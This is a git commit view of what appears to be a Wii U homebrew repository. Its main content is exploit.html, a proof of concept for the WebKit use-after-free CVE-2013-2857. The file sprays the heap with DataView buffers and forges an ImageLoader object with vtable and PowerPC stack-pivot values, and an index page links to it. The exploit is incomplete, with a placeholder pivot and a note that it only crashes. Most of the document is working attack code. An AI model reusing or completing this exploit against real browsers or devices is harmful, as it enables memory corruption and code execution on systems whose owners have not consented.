Browse Source

Initial commit

pull/1/head
Winbagility 2 years ago
commit
6e6d575e06
5 changed files with 75 additions and 0 deletions
  1. BIN
      diibugger.mp4
  2. +64
    -0
      exploit.html
  3. BIN
      illuminati.mp4
  4. +11
    -0
      index.html
  5. BIN
      tcpgecko.mp4

BIN
diibugger.mp4 View File


+ 64
- 0
exploit.html View File

@@ -0,0 +1,64 @@
<!--
Tested on 5.5.1
CVE-2013-2857
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: Bug is present, crash on what is presumably render
-->
<script>
function UaF(a)
{
var pivotAdressAdress = 0x1B000000; //r6
var pivotAdress = 0x41414140; //0x0101cd80; //mr r1,r11; blr
var sizeWebCoreImageLoader = 0x18;
var sprayCount = 2000;
var _4K = 0x1000;
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
a.type="radio";
//Allocate this new WebCore::ImageLoader over freed WebCore::
var ab = new ArrayBuffer(sizeWebCoreImageLoader);
var dv = new DataView(ab)

/*
0:000:x86> dt webkit!WebCore::ImageLoader
+0x000 __VFN_table : Ptr32
+0x004 m_client : Ptr32 WebCore::ImageLoaderClient
+0x008 m_image : WebCore::CachedResourceHandle<WebCore::CachedImage>
+0x00c m_failedLoadURL : WTF::AtomicString
+0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
+0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
+0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
+0x010 m_imageComplete : Pos 3, 1 Bit
+0x010 m_loadManually : Pos 4, 1 Bit
+0x010 m_elementIsProtected : Pos 5, 1 Bit
*/
//Register:r3 Adress:0x1AF35330-0x1AF35360
dv.setUint32(0x00, 0x41414141); //vtable
dv.setUint32(0x04, pivotAdressAdress); //m_client
dv.setUint32(0x08, 0x00000000); //m_image, must be NULL
dv.setUint32(0x0C, 0x42424242); //m_failedLoadURL
dv.setUint32(0x10, 0x43434343); //m_hasPendingBeforeLoadEvent
dv.setUint32(0x14, 0x44444444); //padding
//Spray large ArrayBuffer with pivotAdress
//Middle range 0x1B000000
var ar = new Array(sprayCount);
for(var i=0; i<sprayCount; i++){
ar[i] = new DataView(new ArrayBuffer(_4K));
for(var j=0; j<_4K; j+=4){
ar[i].setUint32(j, 0x99999999); //filler
}
ar[i].setUint32(0x24, pivotAdressAdress); //lwz r31, 0x24(r6)
//...
ar[i].setUint32(0x00, pivotAdressAdress); //lwz r7, 0x0(r31)
ar[i].setUint32(0xEC, pivotAdress); //lwz r9, 0xEC(r7)
}
//Use the new WebCore::ImageLoader & pivot !
return 0;
}
</script>

<input id="x" type="image" onerror="UaF(this);" src=""/>

BIN
illuminati.mp4 View File


+ 11
- 0
index.html View File

@@ -0,0 +1,11 @@

<center>
<a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
<a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
<a href="exploit.html"><h1>Exploit</h1></a><br/>
<br/>
<br/>
<br/>
<br/>
<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
</center>

BIN
tcpgecko.mp4 View File


Loading…
Cancel
Save